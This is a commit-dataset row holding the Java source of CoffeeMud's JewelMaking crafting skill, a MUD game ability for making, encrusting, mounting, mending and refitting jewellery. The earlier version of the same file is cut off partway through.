lang
stringclasses
2 values
license
stringclasses
13 values
stderr
stringlengths
0
343
commit
stringlengths
40
40
returncode
int64
0
128
repos
stringlengths
6
87.7k
new_contents
stringlengths
0
6.23M
new_file
stringlengths
3
311
old_contents
stringlengths
0
6.23M
message
stringlengths
6
9.1k
old_file
stringlengths
3
311
subject
stringlengths
0
4k
git_diff
stringlengths
0
6.31M
Java
apache-2.0
7079cfa9ff39dd2aeb87a1da801e2b0cf9cd6a66
0
bozimmerman/CoffeeMud,bozimmerman/CoffeeMud,bozimmerman/CoffeeMud,bozimmerman/CoffeeMud
package com.planet_ink.coffee_mud.Abilities.Common; import com.planet_ink.coffee_mud.core.interfaces.*; import com.planet_ink.coffee_mud.core.*; import com.planet_ink.coffee_mud.core.collections.*; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftParms; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftingActivity; import com.planet_ink.coffee_mud.Abilities.interfaces.*; import com.planet_ink.coffee_mud.Areas.interfaces.*; import com.planet_ink.coffee_mud.Behaviors.interfaces.*; import com.planet_ink.coffee_mud.CharClasses.interfaces.*; import com.planet_ink.coffee_mud.Commands.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.Session.InputCallback; import com.planet_ink.coffee_mud.Exits.interfaces.*; import com.planet_ink.coffee_mud.Items.interfaces.*; import com.planet_ink.coffee_mud.Libraries.interfaces.AchievementLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.ListingLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.MaterialLibrary; import com.planet_ink.coffee_mud.Locales.interfaces.*; import com.planet_ink.coffee_mud.MOBS.interfaces.*; import com.planet_ink.coffee_mud.Races.interfaces.*; import java.util.*; /* Copyright 2002-2018 Bo Zimmerman Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ public class JewelMaking extends EnhancedCraftingSkill implements ItemCraftor, MendingSkill { @Override public String ID() { return "JewelMaking"; } private final static String localizedName = CMLib.lang().L("Jewel Making"); @Override public String name() { return localizedName; } private static final String[] triggerStrings = I(new String[] { "JEWEL", "JEWELMAKING" }); @Override public String[] triggerStrings() { return triggerStrings; } @Override public String supportedResourceString() { return "GLASS|PRECIOUS|SAND"; } @Override public String parametersFormat() { return "ITEM_NAME\tITEM_LEVEL\tBUILD_TIME_TICKS\tMATERIALS_REQUIRED\tITEM_BASE_VALUE\t" +"ITEM_CLASS_ID\tSTATUE||CODED_WEAR_LOCATION\tN_A\tBASE_ARMOR_AMOUNT||DICE_SIDES\tOPTIONAL_RESOURCE_OR_MATERIAL\tCODED_SPELL_LIST"; } //protected static final int RCP_FINALNAME=0; //protected static final int RCP_LEVEL=1; //protected static final int RCP_TICKS=2; protected static final int RCP_WOOD = 3; protected static final int RCP_VALUE = 4; protected static final int RCP_CLASSTYPE = 5; protected static final int RCP_MISCTYPE = 6; // private static final int RCP_CAPACITY=7; protected static final int RCP_ARMORDMG = 8; protected static final int RCP_EXTRAREQ = 9; protected static final int RCP_SPELL = 10; protected Pair<Item,String> beingDone=null; @Override public boolean tick(final Tickable ticking, final int tickID) { if((affected!=null)&&(affected instanceof MOB)&&(tickID==Tickable.TICKID_MOB)) { final MOB mob=(MOB)affected; if(fireRequired) { if((buildingI==null) ||(getRequiredFire(mob,0)==null)) { messedUp=true; unInvoke(); } } } return super.tick(ticking,tickID); } @Override public String parametersFile() { return "jewelmaking.txt"; } @Override protected List<List<String>> loadRecipes() { return super.loadRecipes(parametersFile()); } @Override protected boolean doLearnRecipe(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { fireRequired=false; return super.doLearnRecipe( mob, commands, givenTarget, auto, asLevel ); } @Override public void unInvoke() { if(canBeUninvoked()) { if(affected instanceof MOB) { final MOB mob=(MOB)affected; if((buildingI!=null)&&(!aborted)) { if(beingDone!=null) { if(messedUp) commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); else { final Item I=beingDone.first; buildingI.setBaseValue(buildingI.baseGoldValue()+(I.baseGoldValue()*2)); buildingI.setDescription(buildingI.description()+" "+beingDone.second); } beingDone=null; } else if(messedUp) { if(activity == CraftingActivity.MENDING) messedUpCrafting(mob); else if(activity == CraftingActivity.LEARNING) { commonEmote(mob,L("<S-NAME> fail(s) to learn how to make @x1.",buildingI.name())); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) commonEmote(mob,L("<S-NAME> mess(es) up refitting @x1.",buildingI.name())); else commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); } else { if(activity == CraftingActivity.MENDING) { buildingI.setUsesRemaining(100); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.MENDER, 1, this); } else if(activity==CraftingActivity.LEARNING) { deconstructRecipeInto(mob, buildingI, recipeHolder ); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) { buildingI.basePhyStats().setHeight(0); buildingI.recoverPhyStats(); } else { dropAWinner(mob,buildingI); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.CRAFTING, 1, this); } } } buildingI=null; activity = CraftingActivity.CRAFTING; } } super.unInvoke(); } @Override public boolean mayICraft(final Item I) { if(I==null) return false; if(!super.mayBeCrafted(I)) return false; if(CMLib.flags().isDeadlyOrMaliciousEffect(I)) return false; if((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS) { if(I instanceof Rideable) { final Rideable R=(Rideable)I; final int rideType=R.rideBasis(); switch(rideType) { case Rideable.RIDEABLE_LADDER: case Rideable.RIDEABLE_SLEEP: case Rideable.RIDEABLE_SIT: case Rideable.RIDEABLE_TABLE: return true; default: return false; } } else if(I instanceof Armor) { if(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST)) return true; return (isANativeItem(I.Name())); } if(I.rawProperLocationBitmap()==Wearable.WORN_HELD) return true; return true; } else if((I instanceof Armor) &&(((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL))) { final Armor A=(Armor)I; if((CMath.bset(A.getLayerAttributes(), Armor.LAYERMASK_SEETHROUGH)) &&(A.basePhyStats().armor()<3)) return true; if((A.basePhyStats().armor()<2) &&(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST))) return true; return (isANativeItem(I.Name())); } return (isANativeItem(I.Name())); } @Override public boolean supportsMending(final Physical I) { return canMend(null, I, true); } @Override protected boolean canMend(final MOB mob, final Environmental E, final boolean quiet) { if(!super.canMend(mob,E,quiet)) return false; if((!(E instanceof Item)) ||(!mayICraft((Item)E))) { if(!quiet) commonTell(mob,L("That's not an jewelworked item.")); return false; } return true; } @Override public String getDecodedComponentsDescription(final MOB mob, final List<String> recipe) { return super.getComponentDescription( mob, recipe, RCP_WOOD ); } @Override public boolean invoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { return autoGenInvoke(mob,commands,givenTarget,auto,asLevel,0,false,new Vector<Item>(0)); } @Override protected boolean autoGenInvoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel, final int autoGenerate, final boolean forceLevels, final List<Item> crafted) { final List<String> originalCommands = new XVector<String>(commands); if(super.checkStop(mob, commands)) return true; if(super.checkInfo(mob, commands)) return true; fireRequired=true; final PairVector<EnhancedExpertise,Integer> enhancedTypes=enhancedTypes(mob,commands); int recipeLevel = 1; randomRecipeFix(mob,addRecipes(mob,loadRecipes()),commands,autoGenerate); if(commands.size()==0) { commonTell(mob,L("Make what? Enter \"jewel list\" for a list. You may also enter jewel encrust <gem name> <item name>, " + "jewel mount <gem name> <item name>, jewel refit <item name>, jewel info <item>, jewel learn <item>, " + "jewel scan, jewel mend <item name>, or jewel stop to cancel.")); return false; } if((!auto) &&(commands.size()>0) &&((commands.get(0)).equalsIgnoreCase("bundle"))) { bundling=true; if(super.invoke(mob,commands,givenTarget,auto,asLevel)) return super.bundle(mob,commands); return false; } final List<List<String>> recipes=addRecipes(mob,loadRecipes()); final String str=commands.get(0); String startStr=null; fireRequired=true; bundling=false; int duration=4; String misctype=""; if(str.equalsIgnoreCase("list")) { String mask=CMParms.combine(commands,1); boolean allFlag=false; if(mask.equalsIgnoreCase("all")) { allFlag=true; mask=""; } int toggler=1; final int toggleTop=2; final StringBuffer buf=new StringBuffer(""); final int[] cols={ CMLib.lister().fixColWidth(27,mob.session()), CMLib.lister().fixColWidth(3,mob.session()), CMLib.lister().fixColWidth(5,mob.session()) }; for(int r=0;r<toggleTop;r++) buf.append((r>0?" ":"")+CMStrings.padRight(L("Item"),cols[0])+" "+CMStrings.padRight(L("Lvl"),cols[1])+" "+CMStrings.padRight(L("Metal"),cols[2])); buf.append("\n\r"); final List<List<String>> listRecipes=((mask.length()==0) || mask.equalsIgnoreCase("all")) ? recipes : super.matchingRecipeNames(recipes, mask, true); for(int r=0;r<listRecipes.size();r++) { final List<String> V=listRecipes.get(r); if(V.size()>0) { final String item=replacePercent(V.get(RCP_FINALNAME),""); final int level=CMath.s_int(V.get(RCP_LEVEL)); final String wood=getComponentDescription(mob,V,RCP_WOOD); if(wood.length()>5) { if(toggler>1) buf.append("\n\r"); toggler=toggleTop; } if((level<=xlevel(mob))||allFlag) { buf.append(CMStrings.padRight(item,cols[0])+" "+CMStrings.padRight(""+level,cols[1])+" "+CMStrings.padRightPreserve(""+wood,cols[2])+((toggler!=toggleTop)?" ":"\n\r")); if(++toggler>toggleTop) toggler=1; } } } commonTell(mob,buf.toString()); enhanceList(mob); return true; } else if(((commands.get(0))).equalsIgnoreCase("learn")) { return doLearnRecipe(mob, commands, givenTarget, auto, asLevel); } else if((str.equalsIgnoreCase("encrust"))||(str.equalsIgnoreCase("mount"))) { final String word=str.toLowerCase(); if(commands.size()<3) { commonTell(mob,L("@x1 what jewel onto what item?",CMStrings.capitalizeAndLower(word))); return false; } final Item fire=getRequiredFire(mob,autoGenerate); buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; if(fire==null) return false; final String jewel=commands.get(1); final String rest=CMParms.combine(commands,2); final Environmental jewelE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,jewel,Wearable.FILTER_UNWORNONLY); final Environmental thangE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,rest,Wearable.FILTER_UNWORNONLY); if((jewelE==null)||(!CMLib.flags().canBeSeenBy(jewelE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",jewel)); return false; } if((thangE==null)||(!CMLib.flags().canBeSeenBy(thangE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",rest)); return false; } if((!(jewelE instanceof RawMaterial))||(!(jewelE instanceof Item)) ||(((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_PRECIOUS) &&((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_GLASS))) { commonTell(mob,L("A @x1 is not suitable to @x2 on anything.",jewelE.name(),word)); return false; } final Item jewelI=(Item)CMLib.materials().unbundle((Item)jewelE,1,null); if(jewelI==null) { commonTell(mob,L("@x1 is not pure enough to be @x2ed with. You will need to use a gathered one.",jewelE.name(),word)); return false; } if((!(thangE instanceof Item)) ||(!thangE.isGeneric()) ||(((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_CLOTH) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_METAL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_MITHRIL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_SYNTHETIC) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_ROCK) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_WOODEN) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_LEATHER))) { commonTell(mob,L("A @x1 is not suitable to be @x2ed on.",thangE.name(),word)); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; buildingI=(Item)thangE; beingDone=new Pair<Item,String>(null,""); String materialName=RawMaterial.CODES.NAME(jewelI.material()).toLowerCase(); if(word.equals("encrust")) { beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" is encrusted with bits of "+materialName+"."); startStr=L("<S-NAME> start(s) encrusting @x1 with @x2.",buildingI.name(),materialName); displayText=L("You are encrusting @x1 with @x2",buildingI.name(),materialName); verb=L("encrusting @x1 with bits of @x2",buildingI.name(),materialName); } else { materialName=CMLib.english().startWithAorAn(materialName).toLowerCase(); beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" has "+materialName+" mounted on it."); startStr=L("<S-NAME> start(s) mounting @x1 onto @x2.",materialName,buildingI.name()); displayText=L("You are mounting @x1 onto @x2",materialName,buildingI.name()); verb=L("mounting @x1 onto @x2",materialName,buildingI.name()); } beingDone.first = jewelI; messedUp=!proficiencyCheck(mob,0,auto); duration=10; final CMMsg msg=CMClass.getMsg(mob,null,this,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { jewelI.destroy(); mob.location().send(mob,msg); beneficialAffect(mob,mob,asLevel,duration); return true; } return false; } if(str.equalsIgnoreCase("scan")) return publicScan(mob,commands); else if(str.equalsIgnoreCase("mend")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(!canMend(mob, buildingI,false)) return false; activity = CraftingActivity.MENDING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) mending @x1.",buildingI.name()); displayText=L("You are mending @x1",buildingI.name()); verb=L("mending @x1",buildingI.name()); } else if(str.equalsIgnoreCase("refit")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(buildingI==null) return false; if(!mayICraft(mob,buildingI)) return false; if(buildingI.phyStats().height()==0) { commonTell(mob,L("@x1 is already the right size.",buildingI.name(mob))); return false; } activity = CraftingActivity.REFITTING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) refitting @x1.",buildingI.name()); displayText=L("You are refitting @x1",buildingI.name()); verb=L("refitting @x1",buildingI.name()); } else { beingDone=null; buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; String statue=null; if((commands.size()>1)&&(commands.get(commands.size()-1)).startsWith("STATUE=")) { statue=((commands.get(commands.size()-1)).substring(7)).trim(); if(statue.length()==0) statue=null; else commands.remove(commands.size()-1); } int amount=-1; if((commands.size()>1)&&(CMath.isNumber(commands.get(commands.size()-1)))) { amount=CMath.s_int(commands.get(commands.size()-1)); commands.remove(commands.size()-1); } final String recipeName=CMParms.combine(commands,0); List<String> foundRecipe=null; final List<List<String>> matches=matchingRecipeNames(recipes,recipeName,true); for(int r=0;r<matches.size();r++) { final List<String> V=matches.get(r); if(V.size()>0) { final int level=CMath.s_int(V.get(RCP_LEVEL)); if((autoGenerate>0)||(level<=xlevel(mob))) { foundRecipe=V; recipeLevel=level; break; } } } if(foundRecipe==null) { commonTell(mob,L("You don't know how to make a '@x1'. Try \"jewel list\" for a list.",recipeName)); return false; } misctype=foundRecipe.get(RCP_MISCTYPE); bundling=misctype.equalsIgnoreCase("BUNDLE"); if(!bundling) { final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; } else fireRequired=false; final String woodRequiredStr = foundRecipe.get(RCP_WOOD); final int[] compData = new int[CF_TOTAL]; final String realRecipeName=replacePercent(foundRecipe.get(RCP_FINALNAME),""); final List<Object> componentsFoundList=getAbilityComponents(mob, woodRequiredStr, "make "+CMLib.english().startWithAorAn(realRecipeName),autoGenerate,compData,1); if(componentsFoundList==null) return false; int woodRequired=CMath.s_int(woodRequiredStr); woodRequired=adjustWoodRequired(woodRequired,mob); if(amount>woodRequired) woodRequired=amount; final String otherRequired=foundRecipe.get(RCP_EXTRAREQ); final int[] pm={RawMaterial.MATERIAL_MITHRIL,RawMaterial.MATERIAL_METAL}; final int[][] data=fetchFoundResourceData(mob, woodRequired,"metal",pm, otherRequired.length()>0?1:0,otherRequired,null, false, autoGenerate, enhancedTypes); if(data==null) return false; fixDataForComponents(data,woodRequiredStr,(autoGenerate>0) && (woodRequired==0),componentsFoundList, 1); woodRequired=data[0][FOUND_AMT]; final Session session=mob.session(); if((misctype.equalsIgnoreCase("statue")) &&(session!=null) &&((statue==null)||(statue.trim().length()==0))) { final Ability me=this; final Physical target=givenTarget; if(autoGenerate>0) statue=mob.Name(); else session.prompt(new InputCallback(InputCallback.Type.PROMPT,"",0) { @Override public void showPrompt() { session.promptPrint(L("What is this item a representation of?\n\r: ")); } @Override public void timedOut() { } @Override public void callBack() { final String of=this.input; if((of.trim().length()==0)||(of.indexOf('<')>=0)) return; final Vector<String> newCommands=new XVector<String>(originalCommands); newCommands.add("STATUE="+of); me.invoke(mob, newCommands, target, auto, asLevel); } }); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; final MaterialLibrary.DeadResourceRecord deadMats; if((componentsFoundList.size() > 0)||(autoGenerate>0)) deadMats = new MaterialLibrary.DeadResourceRecord(); else deadMats = CMLib.materials().destroyResources(mob.location(),woodRequired,data[0][FOUND_CODE],data[1][FOUND_CODE],null,null); final MaterialLibrary.DeadResourceRecord deadComps = CMLib.ableComponents().destroyAbilityComponents(componentsFoundList); final int lostValue=autoGenerate>0?0:(deadMats.lostValue + deadComps.lostValue); buildingI=CMClass.getItem(foundRecipe.get(RCP_CLASSTYPE)); if(buildingI==null) { commonTell(mob,L("There's no such thing as a @x1!!!",foundRecipe.get(RCP_CLASSTYPE))); return false; } duration=getDuration(CMath.s_int(foundRecipe.get(RCP_TICKS)),mob,CMath.s_int(foundRecipe.get(RCP_LEVEL)),4); String itemName=null; buildingI.setMaterial(getBuildingMaterial(woodRequired,data,compData)); if((otherRequired.length()>0)&&(otherRequired.equalsIgnoreCase("PRECIOUS"))) itemName=replacePercent(foundRecipe.get(RCP_FINALNAME),RawMaterial.CODES.NAME((data[1][FOUND_CODE]))).toLowerCase(); else itemName=determineFinalName(foundRecipe.get(RCP_FINALNAME),buildingI.material(),deadMats,deadComps); if(bundling) itemName="a "+woodRequired+"# "+itemName; else if(!CMLib.english().startsWithAnArticle(itemName)) itemName=CMLib.english().startWithAorAn(itemName); buildingI.setName(itemName); startStr=L("<S-NAME> start(s) making @x1.",buildingI.name()); displayText=L("You are making @x1",buildingI.name()); verb=L("making @x1",buildingI.name()); playSound="tinktinktink.wav"; buildingI.setDisplayText(L("@x1 lies here",itemName)); if((data[1][FOUND_CODE]>0) &&(((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL)) &&(((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS))) buildingI.setDescription(L("@x1 made of @x2.",itemName,RawMaterial.CODES.NAME(data[0][FOUND_CODE]).toLowerCase())); else buildingI.setDescription(itemName+". "); buildingI.basePhyStats().setWeight(getStandardWeight(woodRequired+compData[CF_AMOUNT],bundling)); if(buildingI.basePhyStats().weight()<=0) buildingI.basePhyStats().setWeight(1); final int valueAdjust = (woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE]))); buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+valueAdjust); setBrand(mob, buildingI); if((buildingI.material()!=data[1][FOUND_CODE]) &&((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)>0)) buildingI.setBaseValue(buildingI.baseGoldValue()+RawMaterial.CODES.VALUE(data[1][FOUND_CODE])); buildingI.basePhyStats().setLevel(CMath.s_int(foundRecipe.get(RCP_LEVEL))); //int capacity=CMath.s_int((String)foundRecipe.get(RCP_CAPACITY)); final int armordmg=CMath.s_int(foundRecipe.get(RCP_ARMORDMG)); final String spell=(foundRecipe.size()>RCP_SPELL)?foundRecipe.get(RCP_SPELL).trim():""; addSpells(buildingI,spell,deadMats.lostProps,deadComps.lostProps); if((buildingI instanceof Armor)&&(!(buildingI instanceof FalseLimb))) { ((Armor)buildingI).basePhyStats().setArmor(0); if(armordmg!=0) ((Armor)buildingI).basePhyStats().setArmor(armordmg); setWearLocation(buildingI,misctype,0); } if(buildingI.ID().endsWith("Dice")) { buildingI.basePhyStats().setAbility(armordmg); } if((misctype.equalsIgnoreCase("statue")) &&(statue!=null) &&(statue.trim().length()>0)) { buildingI.setName(L("@x1 of @x2",itemName,statue.trim())); buildingI.setDisplayText(L("@x1 of @x2 is here",itemName,statue.trim())); buildingI.setDescription(L("@x1 of @x2. ",itemName,statue.trim())); } if(bundling) buildingI.setBaseValue(lostValue); buildingI.recoverPhyStats(); buildingI.text(); buildingI.recoverPhyStats(); } messedUp=!proficiencyCheck(mob,0,auto); if(bundling) { messedUp=false; duration=1; verb=L("bundling @x1",RawMaterial.CODES.NAME(buildingI.material()).toLowerCase()); startStr=L("<S-NAME> start(s) @x1.",verb); displayText=L("You are @x1",verb); } if(autoGenerate>0) { crafted.add(buildingI); return true; } final CMMsg msg=CMClass.getMsg(mob,buildingI,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { mob.location().send(mob,msg); buildingI=(Item)msg.target(); beneficialAffect(mob,mob,asLevel,duration); enhanceItem(mob,buildingI,recipeLevel,enhancedTypes); return true; } else if(bundling) { messedUp=false; aborted=false; unInvoke(); } return false; } }
com/planet_ink/coffee_mud/Abilities/Common/JewelMaking.java
package com.planet_ink.coffee_mud.Abilities.Common; import com.planet_ink.coffee_mud.core.interfaces.*; import com.planet_ink.coffee_mud.core.*; import com.planet_ink.coffee_mud.core.collections.*; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftParms; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftingActivity; import com.planet_ink.coffee_mud.Abilities.interfaces.*; import com.planet_ink.coffee_mud.Areas.interfaces.*; import com.planet_ink.coffee_mud.Behaviors.interfaces.*; import com.planet_ink.coffee_mud.CharClasses.interfaces.*; import com.planet_ink.coffee_mud.Commands.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.Session.InputCallback; import com.planet_ink.coffee_mud.Exits.interfaces.*; import com.planet_ink.coffee_mud.Items.interfaces.*; import com.planet_ink.coffee_mud.Libraries.interfaces.AchievementLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.ListingLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.MaterialLibrary; import com.planet_ink.coffee_mud.Locales.interfaces.*; import com.planet_ink.coffee_mud.MOBS.interfaces.*; import com.planet_ink.coffee_mud.Races.interfaces.*; import java.util.*; /* Copyright 2002-2018 Bo Zimmerman Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ public class JewelMaking extends EnhancedCraftingSkill implements ItemCraftor, MendingSkill { @Override public String ID() { return "JewelMaking"; } private final static String localizedName = CMLib.lang().L("Jewel Making"); @Override public String name() { return localizedName; } private static final String[] triggerStrings = I(new String[] { "JEWEL", "JEWELMAKING" }); @Override public String[] triggerStrings() { return triggerStrings; } @Override public String supportedResourceString() { return "GLASS|PRECIOUS|SAND"; } @Override public String parametersFormat() { return "ITEM_NAME\tITEM_LEVEL\tBUILD_TIME_TICKS\tMATERIALS_REQUIRED\tITEM_BASE_VALUE\t" +"ITEM_CLASS_ID\tSTATUE||CODED_WEAR_LOCATION\tN_A\tBASE_ARMOR_AMOUNT||DICE_SIDES\tOPTIONAL_RESOURCE_OR_MATERIAL\tCODED_SPELL_LIST"; } //protected static final int RCP_FINALNAME=0; //protected static final int RCP_LEVEL=1; //protected static final int RCP_TICKS=2; protected static final int RCP_WOOD = 3; protected static final int RCP_VALUE = 4; protected static final int RCP_CLASSTYPE = 5; protected static final int RCP_MISCTYPE = 6; // private static final int RCP_CAPACITY=7; protected static final int RCP_ARMORDMG = 8; protected static final int RCP_EXTRAREQ = 9; protected static final int RCP_SPELL = 10; protected Pair<Item,String> beingDone=null; @Override public boolean tick(final Tickable ticking, final int tickID) { if((affected!=null)&&(affected instanceof MOB)&&(tickID==Tickable.TICKID_MOB)) { final MOB mob=(MOB)affected; if(fireRequired) { if((buildingI==null) ||(getRequiredFire(mob,0)==null)) { messedUp=true; unInvoke(); } } } return super.tick(ticking,tickID); } @Override public String parametersFile() { return "jewelmaking.txt"; } @Override protected List<List<String>> loadRecipes() { return super.loadRecipes(parametersFile()); } @Override protected boolean doLearnRecipe(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { fireRequired=false; return super.doLearnRecipe( mob, commands, givenTarget, auto, asLevel ); } @Override public void unInvoke() { if(canBeUninvoked()) { if(affected instanceof MOB) { final MOB mob=(MOB)affected; if((buildingI!=null)&&(!aborted)) { if(beingDone!=null) { if(messedUp) commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); else { final Item I=beingDone.first; buildingI.setBaseValue(buildingI.baseGoldValue()+(I.baseGoldValue()*2)); buildingI.setDescription(buildingI.description()+" "+beingDone.second); } beingDone=null; } else if(messedUp) { if(activity == CraftingActivity.MENDING) messedUpCrafting(mob); else if(activity == CraftingActivity.LEARNING) { commonEmote(mob,L("<S-NAME> fail(s) to learn how to make @x1.",buildingI.name())); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) commonEmote(mob,L("<S-NAME> mess(es) up refitting @x1.",buildingI.name())); else commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); } else { if(activity == CraftingActivity.MENDING) { buildingI.setUsesRemaining(100); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.MENDER, 1, this); } else if(activity==CraftingActivity.LEARNING) { deconstructRecipeInto(mob, buildingI, recipeHolder ); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) { buildingI.basePhyStats().setHeight(0); buildingI.recoverPhyStats(); } else { dropAWinner(mob,buildingI); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.CRAFTING, 1, this); } } } buildingI=null; activity = CraftingActivity.CRAFTING; } } super.unInvoke(); } @Override public boolean mayICraft(final Item I) { if(I==null) return false; if(!super.mayBeCrafted(I)) return false; if(CMLib.flags().isDeadlyOrMaliciousEffect(I)) return false; if((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS) { if(I instanceof Rideable) { final Rideable R=(Rideable)I; final int rideType=R.rideBasis(); switch(rideType) { case Rideable.RIDEABLE_LADDER: case Rideable.RIDEABLE_SLEEP: case Rideable.RIDEABLE_SIT: case Rideable.RIDEABLE_TABLE: return true; default: return false; } } else if(I instanceof Armor) { if(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST)) return true; return (isANativeItem(I.Name())); } if(I.rawProperLocationBitmap()==Wearable.WORN_HELD) return true; return true; } else if((I instanceof Armor) &&(((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL))) { final Armor A=(Armor)I; if((CMath.bset(A.getLayerAttributes(), 